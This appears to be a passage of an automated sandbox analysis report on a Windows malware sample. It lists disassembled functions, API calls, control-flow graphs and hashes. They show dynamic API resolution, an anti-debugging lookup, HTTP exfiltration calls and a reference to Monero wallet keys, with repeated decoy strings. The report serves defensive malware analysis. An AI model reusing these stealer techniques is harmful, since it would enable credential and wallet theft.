                          • GetProcAddress.KERNEL32(75670000,01225368), ref: 00559B7E
                          • GetProcAddress.KERNEL32(77310000,01238988), ref: 00559B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00559BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00559BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                          • Instruction ID: 20cf7de71441e090b42239d53a9037580b2980235055d27f3fc788ab4f19a7f6
                          • Opcode Fuzzy Hash: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                          • Instruction Fuzzy Hash: CAA16BB5580240BFF345EFA8ED889563BF9F79C701734C51BA605C3224D63DA852EB2A
                          Function 005445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 5445c0-544695 RtlAllocateHeap 781 5446a0-5446a6 764->781 782 5446ac-54474a 781->782 783 54474f-5447a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0054460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0054479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544622
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 4f384c44a6c619a920b511336b561b7f5fc94229a2d4c7a29801b4a3bfa891bc
                          • Instruction ID: a659e77437ee3ac910183a803c7a627ab56816e790ed29c6dc2ed597917957bf
                          • Opcode Fuzzy Hash: 4f384c44a6c619a920b511336b561b7f5fc94229a2d4c7a29801b4a3bfa891bc
                          • Instruction Fuzzy Hash: 8F41F6747C660C7AC724FBA4A86EEED7B66FF52704F685440A8C153380DAF07508C51A
                          Function 00544880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 544880-544942 call 55a7a0 call 5447b0 call 55a740 * 5 InternetOpenA StrCmpCA 816 544944 801->816 817 54494b-54494f 801->817 816->817 818 544955-544acd call 558b60 call 55a920 call 55a8a0 call 55a800 * 2 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a920 call 55a8a0 call 55a800 * 2 InternetConnectA 817->818 819 544ecb-544ef3 InternetCloseHandle call 55aad0 call 549ac0 817->819 818->819 905 544ad3-544ad7 818->905 829 544ef5-544f2d call 55a820 call 55a9b0 call 55a8a0 call 55a800 819->829 830 544f32-544fa2 call 558990 * 2 call 55a7a0 call 55a800 * 8 819->830 829->830 906 544ae5 905->906 907 544ad9-544ae3 905->907 908 544aef-544b22 HttpOpenRequestA 906->908 907->908 909 544ebe-544ec5 InternetCloseHandle 908->909 910 544b28-544e28 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a740 call 55a920 * 2 call 55a8a0 call 55a800 * 2 call 55aad0 lstrlen call 55aad0 * 2 lstrlen call 55aad0 HttpSendRequestA 908->910 909->819 1021 544e32-544e5c InternetReadFile 910->1021 1022 544e67-544eb9 InternetCloseHandle call 55a800 1021->1022 1023 544e5e-544e65 1021->1023 1022->909 1023->1022 1024 544e69-544ea7 call 55a9b0 call 55a8a0 call 55a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00544915
                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 0054493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00544ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00560DDB,00000000,?,?,00000000,?,",00000000,?,0123FCD0), ref: 00544DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00544E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00544E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00544E49
                          • InternetCloseHandle.WININET(00000000), ref: 00544EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00544EC5
                          • HttpOpenRequestA.WININET(00000000,0123FBA0,?,0123F440,00000000,00000000,00400100,00000000), ref: 00544B15
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • InternetCloseHandle.WININET(00000000), ref: 00544ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                          • Instruction ID: 11bfdefe5bde5ff7d9ebae7526ccd04d132c2cd9998d10409d069d06a633ba0d
                          • Opcode Fuzzy Hash: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                          • Instruction Fuzzy Hash: 83120F72910119AADB15EB90DC66FEEBB38BF94301F50429AB50663091EF702F4DCF66
                          Function 00557850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                          • Instruction ID: 2c4d2b98053619506c1266ad9c209b0f1d8a9943a6f3c67b784837e2a1d16652
                          • Opcode Fuzzy Hash: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                          • Instruction Fuzzy Hash: 0BF04FB2944208ABDB10DF98DD49BAEBBB8FB08721F10465AFA05A2680C77815048BA1
                          Function 00541160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                          • Instruction ID: 866bd86557b26f156826fc20dd0e5d3d36d6d3039ae17df4f0d0e268f7677cd0
                          • Opcode Fuzzy Hash: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                          • Instruction Fuzzy Hash: 02D05E7494030CEBDB00DFE0D8496DDBB78FB08315F101555D90562340EA345481CBAA
                          Function 00559C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 559c10-559c1a 634 55a036-55a0ca LoadLibraryA * 8 633->634 635 559c20-55a031 GetProcAddress * 43 633->635 636 55a146-55a14d 634->636 637 55a0cc-55a141 GetProcAddress * 5 634->637 635->634 638 55a216-55a21d 636->638 639 55a153-55a211 GetProcAddress * 8 636->639 637->636 640 55a21f-55a293 GetProcAddress * 5 638->640 641 55a298-55a29f 638->641 639->638 640->641 642 55a2a5-55a332 GetProcAddress * 6 641->642 643 55a337-55a33e 641->643 642->643 644 55a344-55a41a GetProcAddress * 9 643->644 645 55a41f-55a426 643->645 644->645 646 55a4a2-55a4a9 645->646 647 55a428-55a49d GetProcAddress * 5 645->647 648 55a4dc-55a4e3 646->648 649 55a4ab-55a4d7 GetProcAddress * 2 646->649 647->646 650 55a515-55a51c 648->650 651 55a4e5-55a510 GetProcAddress * 2 648->651 649->648 652 55a612-55a619 650->652 653 55a522-55a60d GetProcAddress * 10 650->653 651->650 654 55a67d-55a684 652->654 655 55a61b-55a678 GetProcAddress * 4 652->655 653->652 656 55a686-55a699 GetProcAddress 654->656 657 55a69e-55a6a5 654->657 655->654 656->657 658 55a6a7-55a703 GetProcAddress * 4 657->658 659 55a708-55a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(76210000,012253C8), ref: 00559C2D
                          • GetProcAddress.KERNEL32(76210000,012255C8), ref: 00559C45
                          • GetProcAddress.KERNEL32(76210000,01239070), ref: 00559C5E
                          • GetProcAddress.KERNEL32(76210000,01238FB0), ref: 00559C76
                          • GetProcAddress.KERNEL32(76210000,01238FF8), ref: 00559C8E
                          • GetProcAddress.KERNEL32(76210000,0123DCE8), ref: 00559CA7
                          • GetProcAddress.KERNEL32(76210000,0122A5E0), ref: 00559CBF
                          • GetProcAddress.KERNEL32(76210000,0123DB98), ref: 00559CD7
                          • GetProcAddress.KERNEL32(76210000,0123DDA8), ref: 00559CF0
                          • GetProcAddress.KERNEL32(76210000,0123DAC0), ref: 00559D08
                          • GetProcAddress.KERNEL32(76210000,0123DBF8), ref: 00559D20
                          • GetProcAddress.KERNEL32(76210000,01225468), ref: 00559D39
                          • GetProcAddress.KERNEL32(76210000,01225488), ref: 00559D51
                          • GetProcAddress.KERNEL32(76210000,012255E8), ref: 00559D69
                          • GetProcAddress.KERNEL32(76210000,01225528), ref: 00559D82
                          • GetProcAddress.KERNEL32(76210000,0123DB08), ref: 00559D9A
                          • GetProcAddress.KERNEL32(76210000,0123DB20), ref: 00559DB2
                          • GetProcAddress.KERNEL32(76210000,0122A900), ref: 00559DCB
                          • GetProcAddress.KERNEL32(76210000,012253E8), ref: 00559DE3
                          • GetProcAddress.KERNEL32(76210000,0123DB68), ref: 00559DFB
                          • GetProcAddress.KERNEL32(76210000,0123DC70), ref: 00559E14
                          • GetProcAddress.KERNEL32(76210000,0123DB38), ref: 00559E2C
                          • GetProcAddress.KERNEL32(76210000,0123DD60), ref: 00559E44
                          • GetProcAddress.KERNEL32(76210000,01225668), ref: 00559E5D
                          • GetProcAddress.KERNEL32(76210000,0123DAD8), ref: 00559E75
                          • GetProcAddress.KERNEL32(76210000,0123DD30), ref: 00559E8D
                          • GetProcAddress.KERNEL32(76210000,0123DD00), ref: 00559EA6
                          • GetProcAddress.KERNEL32(76210000,0123DD18), ref: 00559EBE
                          • GetProcAddress.KERNEL32(76210000,0123DD78), ref: 00559ED6
                          • GetProcAddress.KERNEL32(76210000,0123DD48), ref: 00559EEF
                          • GetProcAddress.KERNEL32(76210000,0123DD90), ref: 00559F07
                          • GetProcAddress.KERNEL32(76210000,0123DAF0), ref: 00559F1F
                          • GetProcAddress.KERNEL32(76210000,0123DB50), ref: 00559F38
                          • GetProcAddress.KERNEL32(76210000,0122FCE8), ref: 00559F50
                          • GetProcAddress.KERNEL32(76210000,0123DBB0), ref: 00559F68
                          • GetProcAddress.KERNEL32(76210000,0123DB80), ref: 00559F81
                          • GetProcAddress.KERNEL32(76210000,012256A8), ref: 00559F99
                          • GetProcAddress.KERNEL32(76210000,0123DC88), ref: 00559FB1
                          • GetProcAddress.KERNEL32(76210000,012256C8), ref: 00559FCA
